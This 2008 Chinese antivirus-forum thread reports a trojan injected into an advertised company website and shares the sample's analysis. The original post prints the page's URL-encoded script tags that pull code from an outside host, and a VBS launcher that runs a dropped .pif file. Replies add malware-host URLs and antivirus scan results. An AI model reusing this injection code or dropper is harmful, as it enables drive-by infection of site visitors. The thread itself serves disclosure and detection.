查看: 5783|回复: 23
收起左侧

[病毒样本] 卡饭中的广告有马

[复制链接]
凝逸反毒
发表于 2008-9-24 18:49:01 | 显示全部楼层 |阅读模式
卡饭中的广告有马

http://bbs.kafan.cn/thread-334208-1-1.html
这个广告
广州奥佳塑料制品有限公司
http://www.gzaojia.com/product.asp

不小心点到 这个广告,弹出
2008-09-24 18:38:44 应用程序保护(运行应用程序)     操作:阻止
进程路径:C:\windows\System32\WScript.exe
文件路径:C:\Documents and Settings\***\Local Settings\Temp\GameeeEeee.pif

=======网页加有网马============
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>产品展厅</TITLE>
<script src=http://%61%76%65%32%2E%63%6E></script><script src=http://%61%76%65%32%2E%63%
6E></script><script src=http://%61%76%65%32%2E%63%6E></script><script src=http://%61%76%65%
32%2E%63%6E></script><script src=http://%61%76%65%32%2E%63%6E></script><script src=http://%
61%76%65%33%2E%63%6E></script>
------------
GameeeEeee.pif
Gameeeeeee.vbs
---Gameeeeeee.vbs------
'I LOVE gameee TEAM'I LOVE gameee TEAM
Set Love_gameee = CreateObject("Wscript.Shell")'I LOVE gameee TEAM
'I LOVE gameee TEAM'I LOVE gameee TEAM
Love_gameee.run ("C:\DOCUME~1\ccc1\LOCALS~1\Temp\GameeeEeee.pif")
'I LOVE gameee TEAM'I LOVE gameee TEAM
--------

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
xiaojinglf
发表于 2008-9-24 18:53:31 | 显示全部楼层
脚本被小红伞拦截达十几次后。网页正常打开。
Palkia
发表于 2008-9-24 19:09:51 | 显示全部楼层
病毒        2008-09-24  19:09:35        C:\Documents and Settings\Administrator\桌面\c.zip\GameeeEeee.pif        Win32.TrojDownloader.MnlessT.au.45056        清除成功
Nerazzurri
发表于 2008-9-24 19:19:41 | 显示全部楼层

Win32:KillAV-JD [Trj]

elric8
发表于 2008-9-24 19:35:11 | 显示全部楼层
扫描结果 :  58%的杀软(21/36)报告发现病毒
时间 :  2008/09/24 19:31:59 (CST)
软件名称引擎版本
病毒库版本
病毒库时间
扫描结果
时间
a-squared4.0.0.142008.09.172008-09-17-
1.586
AntiVir7.8.1.347.0.6.2042008-09-24TR/Crypt.XDR.Gen
2.379
Arcavir1.0.52008092321432008-09-23-
1.226
AVAST!3.0.1080923-02008-09-23-
0.686
AVG7.5.52.442270.7.1/16882008-09-24Generic11.AEIJ
1.676
BitDefender7.60825.17906507.210142008-09-24Generic.Malware.Sdld.29F8B888 (suspected)
3.304
CA (VET)9.0.0.14331.6.61032008-09-24-
5.704
ClamAV0.9483242008-09-24Trojan.OnlineGames-1517
0.004
Comodo2.112.0.0.6562008-09-24-
0.442
CP Secure1.1.0.7152008.09.242008-09-24-
5.885
Dr.Web4.44.0.91702008.09.242008-09-24DLOADER.Trojan
3.222
ewido4.0.0.22008.09.242008-09-24-
2.711
F-Prot4.4.4.56200809232008-09-23W32/OnlineGames.AJ.gen!Eldorado (generic, not disinfectable)
1.037
F-Secure5.51.61002008.09.24.072008-09-24-
3.432
IkarusT3.1.01.342008.09.24.715192008-09-24Win32.SuspectCrc
3.327
Microsoft1.39032008.09.242008-09-24TrojanDownloader:Win32/Dogrobot.A
4.018
mks_vir2.012008.09.232008-09-23-
2.526
Norman5.93.015.93.002008-09-18W32/Packed/FSG_2.A
5.383
nProtect2008-09-24.0021489882008-09-24Generic.Malware.Sdld.29F8B888
4.484
Quick Heal9.502008.09.242008-09-24Suspicious - DNAScan
1.773
Sophos2.78.04.332008-09-24Mal/Behav-009
2.003
Sunbelt3.1.1666.122552008-09-23VIPRE.Suspicious
0.540
The Hacker6.3.0.9v000922008-09-23-
0.853
VBA323.12.8.520080923.09582008-09-23-
1.304
ViRobot200809242008.09.242008-09-24-
0.406
VirusBuster4.5.11.1010.88.5/6356522008-09-23-
0.843
卡巴斯基5.5.102008.09.242008-09-24Trojan-Dropper.Win32.Agent.xdu
0.068
安博士V32008.09.24.022008.09.242008-09-24-
1.086
江民杀毒11.0.7062008.09.242008-09-24Trojan/Agent.blbi
1.236
熊猫卫士9.05.012008.09.232008-09-23Suspicious file
2.203
瑞星20.020.63.22.002008-09-24Trojan.DL.Win32.Mnless.bes
0.905
赛门铁克1.3.0.2420080923.0032008-09-23-
0.113
趋势科技8.700-10045.564.012008-09-23Cryp_Bits
0.068
迈克菲5.3.0053902008-09-23New Malware.ab
2.093
金山毒霸2008.1.14.152008.9.24.172008-09-24Win32.TrojDownloader.MnlessT.au.45056
0.704
飞塔2.81-3.1139.5802008-09-23PossibleThreat
0.153
注意: 就算报告发现病毒,也可能是杀软误报,请根据查毒结果自行判断
v_ww
头像被屏蔽
发表于 2008-9-24 19:42:32 | 显示全部楼层
ess3.0
E:\Sandbox\wei\virus\user\current\桌面\c.zip > ZIP > GameeeEeee.pif - 未查明的 NewHeur_PE 病毒
BING126
头像被屏蔽
发表于 2008-9-24 20:04:30 | 显示全部楼层
McAfee                New Malware.ab
tanlimo
发表于 2008-9-24 20:12:30 | 显示全部楼层
http://www.zmjjjyy.cn/new/a1.css
http://down.hs7yue.cn/new/a4.css
http://down.hs7yue.cn/down/ko.css


卡饭的常客了,这次终于以另一种方式进驻卡饭
尤金卡巴斯基
发表于 2008-9-24 22:30:42 | 显示全部楼层
2008/9/24 22:29:49        已清除        木马程序 Trojan-Dropper.Win32.Agent.xdu        G:\Temp\Virus\c.zip/GameeeEeee.pif//FSG
Older
发表于 2008-9-24 22:36:45 | 显示全部楼层
费尔狂叫!
杀!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-1-1 15:53 , Processed in 0.098259 second(s), 2 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表